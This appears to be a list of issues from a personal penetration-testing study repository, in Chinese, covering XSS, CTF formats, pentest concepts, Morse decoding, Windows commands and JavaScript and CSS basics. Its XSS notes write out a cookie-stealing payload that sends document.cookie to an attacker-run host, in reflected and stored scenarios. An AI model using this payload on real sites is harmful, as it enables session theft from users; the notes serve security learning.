This cool boy learns penetration testing

Results 47 issues of This cool boy learns penetration testing

XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。 XSS攻击 XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在XSS漏洞的网站,XSS漏洞分为两种,一种是DOM Based XSS漏洞,另一种是Stored XSS漏洞。理论上,所有可输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞,漏洞的危害取决于攻击代码的威力,攻击代码也不局限于script。 DOM Based XSS DOM Based XSS是一种基于网页DOM结构的攻击,该攻击特点是中招的人是少数人。 场景一: 当我登录a.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它测页面处理可能是这样,其它语言类似: ``` XSS测试 页面内容: ``` 我知道了Tom也注册了该网站,并且知道了他的邮箱(或者其它能接收信息的联系方式),我做一个超链接发给他,超链接地址为:http://www.a.com?content=window.open(“www.b.com?param=”+document.cookie),当Tom点击这个链接的时候(假设他已经登录a.com),浏览器就会直接打开b.com,并且把Tom在a.com中的cookie信息发送到b.com,b.com是我搭建的网站,当我的网站接收到该信息时,我就盗取了Tom在a.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!这个过程中,受害者只有Tom自己。那当我在浏览器输入a.com?content=alert(“xss”),浏览器展示页面内容的过程中,就会执行我的脚本,页面输出xss字样,这是攻击了我自己,那我如何攻击别人并且获利呢? Stored XSS Stored XSS是存储式XSS漏洞,由于其攻击代码已经存储到服务器上或者数据库中,所以受害者是很多人。 场景二: a.com可以发文章,我登录后在a.com中发布了一篇文章,文章中包含了恶意代码,window.open(“www.b.com?param=”+document.cookie),保存文章。这时Tom和Jack看到了我发布的文章,当在查看我的文章时就都中招了,他们的cookie信息都发送到了我的服务器上,攻击成功!这个过程中,受害者是多个人。 Stored XSS漏洞危害性更大,危害面更广。 XSS防御 我们是在一个矛盾的世界中,有矛就有盾。只要我们的代码中不存在漏洞,攻击者就无从下手,我们要做一个没有缝的蛋。XSS防御有如下方式。...

[sql注入.docx](https://github.com/yzdily/yzdily.github.io/files/5728011/sql.docx)

### 多元化CTF-区别浅析 CTF预置了已知漏洞 渗透测试挖掘未知漏洞 CTF模拟了大部分攻防手法 实战渗透学习被大量限制 **多元化CTF-模式** AWD攻防模式简介AWD:Attack With Defence,你还得会修防,还得会攻。 CTF传统解题:题目一个个的破解即可。 CTF运维赛:以运维工程角度PK安全技能为主。 CTF个人赛:以个人为单位,进行相关模式的PK。 CTF团体赛:以多人为单位,进行相关模式的PK。 … **多元化CTF-WEB** CTF-WEB能拿Flag的点有很多,分别从低中高三个档次不等 前端HTML查看源代码 多次编码解密 HTTP协议头修改 用Python比速度 绕过安全保护机制 … WEB安全测试能找到的漏洞难度也不一样,如: 银行系统,商城系统,OA办公系统,人力资源系统,邮件系统 … **多元化CTF-WEB-学习条件** 中间件的基础:Apache、IIS、Nginx、WebLogic、Tomcat等 数据库的基础:Oracle、MySql、SqlServer等 编程语言基础:PHP、Python、PythonWeb、Java、JavaWeb等...

概念和流程 渗透测试要求 常见名词解释 其他 ### 渗透测试概念 1、什么是渗透测试 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这 个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能 存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。 2、为什么需要渗透测试 如果把企业的信息安全管理比作牙齿护理,安全服务公司比作牙医,那么企业自己定期进行 渗透测试自查就好比刷牙和使用牙线,如今几乎所有安全顾问公司都会建议企业重视渗透测 试检查,这样可以有效避免很多浅显而严重的失误和漏洞。【安全不是一场运动会,安全是 一场持久战】 3、渗透测试做什么 渗透测试流程 黑盒测试又被称为所谓的“Zero-Knowledge Testing”,渗透者完全处于对系统一无所知的状 态,通常这类型测试,最初的信息获取来自于DNS、Web、Email及各种公开对外的服务器。 白盒测试 : 白盒测试与黑盒测试恰恰相反,测试者可以通过正常渠道向被测单位取得各种资料,包括网 络拓扑、员工资料甚至网站或其它程序的代码片断,也能够与单位的其它员工(销售、程序 员、管理者……)进行面对面的沟通。这类测试的目的是模拟企业内部雇员的越权操作。 灰盒测试 : 灰盒测试是介于白盒测试与黑盒测试之间的一种测试方法。测试人员模拟内部雇员,有一个 内部网络账号,并拥有了访问网络的标准方法。 渗透测试思路...

摩尔斯电码(摩斯密码)的加密与解密 对于没有摩尔斯电码基础的人来说,看到题目内容中点与横杠的加密信息会毫无头绪,题目给出的信息是需要解密得到最终的Flag,那么解密思路至关重要。 解题思路: 1、 理解题目名称所给出的提示; 2、 明确题目内容涉及加密知识; 3、 确定题目内容加密类型与方式; 4、 思考解密方法与过程; 5、 尝试通过解密得到明文。 知识补充:摩尔斯电码(又译为摩斯密码,Morse code)是一种时通时断的信号代码,通过不同的排列顺序来表达不同的英文字母、数字和标点符号。摩尔斯电码由两种基本信号组成:短促的点信号“.”,读“滴”;保持一定时间的长信号“—”,读“嗒”。间隔时间:滴=1t,嗒=3t,滴嗒间=1t,字符间=3t,单词间=7t。 再从题目内容给出的密文分析,密文中只有两种符号且无序,应该是部分符号通过不同的组合来代表解密后的字符。解密过程具有对应性特征,摩斯密码正是通过符号组合对应字母来进行加密。由此可判定出题目内容为摩斯密码加密后的密文。 确定了加密类型为摩斯密码,部分符号通过不同的组合来代表解密后的字符。因为题目中未给出加密方式相关信息,所以默认为使用国际通用的加密表进行加密。 思考既然是通过密码表进行对应加密,那么获取到密码表后就可以进行反向对应解密。下图为国际通用摩斯密码表: ``` 解密原理讲解: 尝试根据标准摩尔斯电码对照表将密文字段逐一对照解密出单个英文字母,然后将英文字母拼接起来。 密文:-...-.- -.-. - ..-. -- .. ... -.-. 因密码中间存在空格分隔所以根据密码表逐个对应...

根据学习的前六章进行考试 [第一阶段考核试题卷12月.docx](https://github.com/yzdily/yzdily.github.io/files/5694622/12.docx)

学习cmd命令是学习电脑技术很重要的一方面,菜鸟要想成为计算机高手学习一些常用cmd命令大全是很有必要的,这里收集的win10命令大全可以帮助你更好的进行学习与折腾。   以下为windows10命令:   1.calc:启动计算器   2.appwiz.cpl:程序和功能   3.certmgr.msc:证书管理实用程序   4.charmap:启动字符映射表   5.chkdsk.exe:Chkdsk磁盘检查(管理员身份运行命令提示符)   6.cleanmgr: 打开磁盘清理工具   7.cliconfg:SQL SERVER 客户端网络实用工具   8.cmstp:连接管理器配置文件安装程序   9.cmd.exe:CMD命令提示符   10.自动关机命令   Shutdown -s -t 600:表示600秒后自动关机   shutdown -a :可取消定时关机   Shutdown -r -t 600:表示600秒后自动重启   rundll32 user32.dll,LockWorkStation:表示锁定计算机   11.colorcpl:颜色管理,配置显示器和打印机等中的色彩   12.CompMgmtLauncher:计算机管理   ...

CTF简介 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。 CTF竞赛模式 (1)解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 (2)攻防模式(Attack-Defense)在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式CTF赛制可以实时通过得分反映出比赛情况,最终也以得分直接分出胜负,是一种竞争激烈,具有很强观赏性和高度透明性的网络安全赛制。在这种赛制中,不仅仅是比参赛队员的智力和技术,也比体力(因为比赛一般都会持续48小时及以上),同时也比团队之间的分工配合与合作。 (3)混合模式(Mix)结合了解题模式与攻防模式的CTF赛制,比如参赛队伍通过解题可以获取一些初始分数,然后通过攻防对抗进行得分增减的零和游戏,最终以得分高低分出胜负。采用混合模式CTF赛制的典型代表如iCTF国际CTF竞赛。 CTF各大题型简介 MISC(安全杂项):全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广。我们平时看到的社工类题目;给你一个流量包让你分析的题目;取证分析题目,都属于这类题目。主要考查参赛选手的各种基础综合知识,考察范围比较广。 PPC(编程类):全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写,批量处理等,有时候用编程去处理问题,会方便的多。当然PPC相比ACM来说,还是较为容易的。至于编程语言嘛,推荐使用Python来尝试。这部分主要考察选手的快速编程能力。 CRYPTO(密码学):全称Cryptography。题目考察各种加解密技术,包括古典加密技术、现代加密技术甚至出题者自创加密技术。实验吧“角斗场”中,这样的题目汇集的最多。这部分主要考查参赛选手密码学相关知识点。 REVERSE(逆向):全称reverse。题目涉及到软件逆向、破解技术等,要求有较强的反汇编、反编译扎实功底。需要掌握汇编,堆栈、寄存器方面的知识。有好的逻辑思维能力。主要考查参赛选手的逆向分析能力。此类题目也是线下比赛的考察重点。 STEGA(隐写):全称Steganography。隐写术是我开始接触CTF觉得比较神奇的一类,知道这个东西的时候感觉好神奇啊,黑客们真是聪明。题目的Flag会隐藏到图片、音频、视频等各类数据载体中供参赛选手获取。载体就是图片、音频、视频等,可能是修改了这些载体来隐藏flag,也可能将flag隐藏在这些载体的二进制空白位置。有时候需要你侦探精神足够的强,才能发现。此类题目主要考查参赛选手的对各种隐写工具、隐写算法的熟悉程度。实验吧“角斗场”的隐写题目在我看来是比较全的,以上说到的都有涵盖。新手盆友们可以去了解下。 PWN(溢出):PWN在黑客俚语中代表着攻破,取得权限,在CTF比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有栈溢出、堆溢出。在CTF比赛中,线上比赛会有,但是比例不会太重,进入线下比赛,逆向和溢出则是战队实力的关键。主要考察参数选手漏洞挖掘和利用能力。 WEB(web类):WEB应用在今天越来越广泛,也是CTF夺旗竞赛中的主要题型,题目涉及到常见的Web漏洞,诸如注入、XSS、文件包含、代码审计、上传等漏洞。这些题目都不是简单的注入、上传题目,至少会有一层的安全过滤,需要选手想办法绕过。且Web题目是国内比较多也是大家比较喜欢的题目。因为大多数人开始安全都是从web日站开始的。 学之前的思考:分析赛题情况 PWN、Reserve偏重对汇编、逆向的理解 Crypto偏重对数学、算法的深入学习 Web编程对技巧沉淀、快速搜索能力的挑战 Misc则更为复杂,所有与计算机安全挑战有关的都算在其中 常规做法 A方向:PWN+Reserver+Crypto随机搭配 B方向:Web+Misc组合 其实Misc所有人都可以做 恶补基础知识&信息安全专业知识...

一、简介 1、概述: JavaScript是目前web开发中不可缺少的脚本语言,js不需要编译即可运行,运行在客户端,需要通过浏览器来解析执行JavaScript代码。 诞生于1995年,当时的主要目的是验证表单的数据是否合法。 JavaScript本来应该叫Livescript,但是在发布前夕,想搭上当时超热的java顺风车,临时把名字改为了JavaScript。(也就是说js跟java没有关系,当时只是想借助java的名气)。 js组成部分: (1)核心(ECMAScript):这一部分主要是js的基本语法。 (2)BOM:Brower Object Model(浏览器对象模型),主要是获取浏览器信息或操作浏览器的,例如:浏览器的前进与后退、浏览器弹出提示框、浏览器地址栏输入网址跳转等操作等。 (3)DOM:Document Object Model(文档对象模型),此处的文档暂且理解为html,html加载到浏览器的内存中,可以使用js的DOM技术对内存中的html节点进行修改,用户从浏览器看到的是js动态修改后的页面。(增删改查) 2、特点: 交互性(它可以做的就是信息的动态交互) 安全性(不允许直接访问本地硬盘) 跨平台性(只要是可以解析js的浏览器都可以执行,和平台无关) 3、和Java区别: JavaScript java Netscape公司的产品 Sun公司的产品,现在Oracle 直译式脚本语言 需要先编译成字节码文件,在执行 弱类型语言 强烈类型语言 4、作用 avaScript 被用来改进设计、验证表单、检测浏览器、创建cookies,等等。JavaScript 是因特网上最流行的脚本语言,并且可在所有主要的浏览器中运行,比如:...

### 五,css样式 5-1 认识css样式 CSS全称为“层叠样式表 (Cascading Style Sheets)”,它主要是用于定义HTML内容在浏览器内的显示样式,如文字大小、颜色、字体加粗等。 如下列代码: p{ font-size:12px; color:red; font-weight:bold; } 使用CSS样式的一个好处是通过定义某个样式,可以让不同网页位置的文字有着统一的字体、字号或者颜色等。 5-2 CSS代码语法 css 样式由选择符和声明组成,而声明又由属性和值组成 选择符{属性:值} p{color:red;} 选择符:又称选择器,指明网页中要应用样式规则的元素,如本例中是网页中所有的段(p)的文字将变成蓝色,而其他的元素(如ol)不会受到影响。 声明:在英文大括号“{}”中的的就是声明,属性和值之间用英文冒号“:”分隔。当有多条声明时,中间可以英文分号“;”分隔,如下所示: p{font-size:12px;color:red;} 5-3 从CSS 样式代码插入的形式来看基本可以分为以下3种: 内联式、嵌入式和外部式三种 1,内联式css样式 就是把css代码直接写在现有的HTML标签中,如下面代码:...